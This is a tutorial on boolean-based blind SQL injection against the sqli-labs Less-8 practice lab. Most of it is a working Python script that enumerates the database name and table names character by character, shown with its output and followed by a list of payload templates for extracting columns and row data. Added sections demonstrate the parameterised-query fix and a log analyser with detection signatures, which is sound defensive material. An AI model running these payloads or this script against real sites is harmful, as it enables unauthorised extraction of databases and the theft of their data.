Reproduction of a Python script for blind SQL injection

Blind SQL injection operation

While studying SQL injection recently, I became particularly interested in how blind injection works, so I wrote some Python scripts for it. The environment used here is Less-8 of sqli-labs; similar modifications can be made for other scenarios.

1. Enumerate the length of the database name

payload: ' and length(database())={}-- +  // {} is the position being brute-forced

2. Enumerate the database name character by character

payload: ' and (substr(database(),{},1))='{}'-- +  // the first {} is the character index within the database name, the second {} is the candidate character at that index

3. Enumerate the number of tables in the target database

payload: ' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- +  // the first {} is the database name, the second {} is the candidate table count

4. Enumerate the length of each table name

payload: ' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- +  // the placeholders are the database name, the table's ordinal (0-based, as used by LIMIT) and the candidate length

5. Enumerate each table name

payload: ' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- +  // placeholders: database name, table ordinal, character index, candidate character

6. Code

Dumping the remaining data uses similar payloads. The source code is given below. My environment is set up locally and the URL is "http://sqlilabs/Less-8/?id=1".

#### Blind injection to obtain data
import requests
import time

header = {
    "Host": "sqlilabs",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Connection": "close"
}
# Candidate characters tried one position at a time. Note that "#", "&", "%" and "+"
# have special meaning in a raw URL and would need percent-encoding to be tested reliably.
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+<>?"
url = "http://sqlilabs/Less-8/?id=1"
# "-- +" decodes to "-- " on the server, which comments out the rest of the original query
length_payload = "' and length(database())={}-- + "


def get_length(url, length_payload):
    for x in range(1, 50):
        ex_url = url + length_payload.format(x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if "You are in" in response.text:
            # print(response.text)
            print("The length is" + str(x))
            return x


length = get_length(url, length_payload)

data_payload = "' and (substr(database(),{},1))='{}'-- + "


def get_data(url, data_payload, length):
    data = ""
    start_time = time.time()
    for x in range(1, length + 1):
        for char in chars:
            ex_url = url + data_payload.format(x, char)
            response = requests.get(ex_url, headers=header)
            if "You are in" in response.text:
                data += char
                print("data is" + data)
                break
    end_time = time.time()
    print("The time taken is: {}".format(end_time - start_time))
    # print(response.text)
    return data


name = get_data(url, data_payload, length)
print("Database name: " + name)

table_count_payload = "' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- + "


def get_table(url, table_payload, db_name):
    for x in range(1, 50):
        ex_url = url + table_payload.format(db_name, x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if "You are in" in response.text:
            # print(response.text)
            print("The number of tables is" + str(x))
            return x


table_count = get_table(url, table_count_payload, name)

table_length_payload = "' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- + "
table_name_payload = "' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- + "


def get_table_name(url, table_length_payload=table_length_payload, table_name_payload=table_name_payload,
                   table_count=table_count, db_name=name):
    table_list = []
    start_time = time.time()
    for i in range(1, table_count + 1):
        data = ""
        # Determine the length of the i-th table name (LIMIT is 0-based, hence i - 1)
        for table_len in range(1, 50):
            ex_url = url + table_length_payload.format(db_name, i - 1, table_len)
            response = requests.get(ex_url, headers=header)
            # print(ex_url)
            if "You are in" in response.text:
                # print(response.text)
                # print("The length of the {}th table is {}".format(i, table_len))
                # Recover the table name one character at a time
                for j in range(1, table_len + 1):
                    for char in chars:
                        ex_url2 = url + table_name_payload.format(db_name, i - 1, j, char)
                        # print(ex_url2)
                        response = requests.get(ex_url2, headers=header)
                        if "You are in" in response.text:
                            data += char
                            # print("data is" + data)
                            break
                table_list.append(data)
                break
    end_time = time.time()
    # print("The {}th table name is {}".format(i, data))
    print("The time taken is: {}".format(end_time - start_time))
    return table_list


print(get_table_name(url))


7. Results

Run it and look at the output:

The length is 8
data is s
The data is se
The data is sec
data is secu
data is secur
data is securi
data is securit
Data is security
The time used is: 1.7992594242095947
Database name: security
The number of tables is 4
The time used is: 6.969999313354492
['emails', 'referers', 'uagents', 'users']

I have commented out the payload printing; if you want to see the payloads, uncomment those print calls.
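The whole script works only because Less-8 behaves as a boolean oracle: a row comes back (and "You are in..." is printed) exactly when the injected condition is true. The following is an added example, not part of the original post or of sqli-labs, that reproduces that oracle in an in-memory SQLite table and puts the string-concatenated query next to the parameterised fix. It assumes Less-8's server-side query is roughly `SELECT * FROM users WHERE id='$id' LIMIT 0,1`; the table contents are constructed.

```python
import sqlite3

# Constructed stand-in for the lab's users table (assumption: Less-8 runs roughly
# SELECT * FROM users WHERE id='$id' LIMIT 0,1 and prints "You are in..." on a hit).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
conn.commit()


def vulnerable_lookup(user_id: str) -> str:
    """String-concatenated query: the id parameter becomes part of the SQL text,
    so a quote in the input changes the query's structure."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    row = conn.execute(sql).fetchone()
    return "You are in..." if row else ""


def safe_lookup(user_id: str) -> str:
    """Parameterised query: the id parameter is bound as a value and is never
    parsed as SQL, so quotes and comment markers inside it are inert."""
    row = conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()
    return "You are in..." if row else ""


def oracle_leaks(lookup, base_id: str = "1") -> bool:
    """A page is a boolean oracle when an always-true and an always-false
    injected condition on the same base id yield different responses.
    The two probes are the generic form of the page's length()/substr() payloads."""
    true_probe = base_id + "' and 1=1-- "
    false_probe = base_id + "' and 1=2-- "
    return lookup(true_probe) != lookup(false_probe)


if __name__ == "__main__":
    print("vulnerable handler leaks:", oracle_leaks(vulnerable_lookup))  # True
    print("parameterised handler leaks:", oracle_leaks(safe_lookup))     # False
```

With the concatenated handler the true/false probes produce different responses, which is all the script above needs; with the bound parameter both probes are treated as a literal id that matches nothing, so the length and substr comparisons in the payload list never reach the SQL parser.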

8. Common blind injection payloads

A summary of common boolean-based blind injection payloads:

Length of the database name: ' and length((select schema_name from information_schema.schemata limit 0,1))={}-- +
Database name, character by character: ' and substring((select schema_name from information_schema.schemata limit 0,1),{},1)='{}'-- +
Number of tables in the specified database: ' and (select count(table_name) from information_schema.tables where table_schema='{}')={}-- +
Length of a table name in the specified database: ' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}-- +
Table name in the specified database: ' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'-- +
Number of columns in the table: ' and (select count(column_name) from information_schema.columns where table_schema='{}' and table_name='{}')={}-- +
Length of a column name in the table: ' and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={}-- +
Column name in the table: ' and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'-- +
Number of rows in the specified table: ' and (select count(*) from {})={}-- +
Length of the specified column value in the specified table: ' and length(substr((select {} from {} limit 0,1),1))={}-- +
Specified column value in the specified table, character by character: ' and substr((select {} from {} limit 0,1),1,1)='{}'-- +
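Every payload in this list shares two detectable traits: a recognisable SQL fragment in a query parameter (length(database()), substr(, information_schema.) and, because each value is brute-forced, a burst of near-identical requests from one client that differ only in a number or a quoted character. The following is an added example, not part of the original post, of a small log analyser that scores both traits over constructed access-log lines in combined log format; the signatures are derived from the payloads on this page, the client addresses and timestamps are made up, and the threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format) approximating what the
# script on this page leaves behind: one client, many near-identical requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:12:00:01 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Oct/2023:12:00:02 +0000] "GET /Less-8/?id=1%27%20and%20length%28database%28%29%29%3D7--%20%2B HTTP/1.1" 200 480
10.0.0.7 - - [01/Oct/2023:12:00:02 +0000] "GET /Less-8/?id=1%27%20and%20length%28database%28%29%29%3D8--%20%2B HTTP/1.1" 200 512
10.0.0.7 - - [01/Oct/2023:12:00:03 +0000] "GET /Less-8/?id=1%27%20and%20%28substr%28database%28%29%2C1%2C1%29%29%3D%27a%27--%20%2B HTTP/1.1" 200 480
10.0.0.7 - - [01/Oct/2023:12:00:03 +0000] "GET /Less-8/?id=1%27%20and%20%28substr%28database%28%29%2C1%2C1%29%29%3D%27s%27--%20%2B HTTP/1.1" 200 512
10.0.0.7 - - [01/Oct/2023:12:00:04 +0000] "GET /Less-8/?id=1%27%20and%20%28select%20count%28table_name%29%20from%20information_schema.tables%20where%20table_schema%3D%27security%27%29%3D4--%20%2B HTTP/1.1" 200 512
10.0.0.9 - - [01/Oct/2023:12:00:05 +0000] "GET /Less-8/?id=2 HTTP/1.1" 200 500
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) \S+')

# Signatures derived from the payload list above (applied to the decoded query string)
SIGNATURES = {
    "length_of_database": re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)", re.I),
    "substr_probe": re.compile(r"\bsubstr(?:ing)?\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "boolean_tail": re.compile(r"'\s*and\s+.+=\s*[^=]+--", re.I),
}


def parse_line(line: str):
    """Return (client_ip, request_path) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return (m.group(1), m.group(3)) if m else None


def decode_query(path: str) -> str:
    """URL-decode the query string so percent-encoded payloads become readable."""
    return unquote_plus(path.split("?", 1)[1]) if "?" in path else ""


def match_signatures(query: str) -> list:
    """Names of all signatures that fire on one decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def normalize(query: str) -> str:
    """Collapse the brute-forced value (a number or a single quoted character) into a
    placeholder so that all requests of one enumeration loop fall into one family."""
    family = re.sub(r"\d+", "N", query.lower())
    return re.sub(r"'[^']'", "'C'", family)


def analyze(log_text: str, threshold: int = 2) -> dict:
    """Per-client summary: total requests, requests matching a signature, and how many
    payload families were repeated at least `threshold` times (the enumeration rhythm)."""
    report = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path = parsed
        entry = report.setdefault(ip, {"requests": 0, "signature_hits": 0, "families": defaultdict(int)})
        entry["requests"] += 1
        query = decode_query(path)
        if match_signatures(query):
            entry["signature_hits"] += 1
            entry["families"][normalize(query)] += 1
    for entry in report.values():
        entry["repeated_families"] = sum(1 for c in entry["families"].values() if c >= threshold)
    return report


def suspicious_clients(log_text: str, threshold: int = 2) -> list:
    """Clients that either sent a signature-matching request or repeated a payload family."""
    return sorted(ip for ip, e in analyze(log_text, threshold).items()
                  if e["signature_hits"] > 0 or e["repeated_families"] > 0)


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["requests"], entry["signature_hits"], entry["repeated_families"])
    print("suspicious:", suspicious_clients(SAMPLE_LOG))  # ['10.0.0.7']
```

Signature matching alone is noisy (a single false positive on a legitimate search term is easy), which is why the family counter is there: the page's own loops send dozens of requests per recovered character, so the same normalised payload recurring from one address is a much stronger signal than any one string. Switching the web server to log the decoded query, or feeding the analyser from the database's query log instead, catches the same rhythm when the attacker obfuscates the literal fragments.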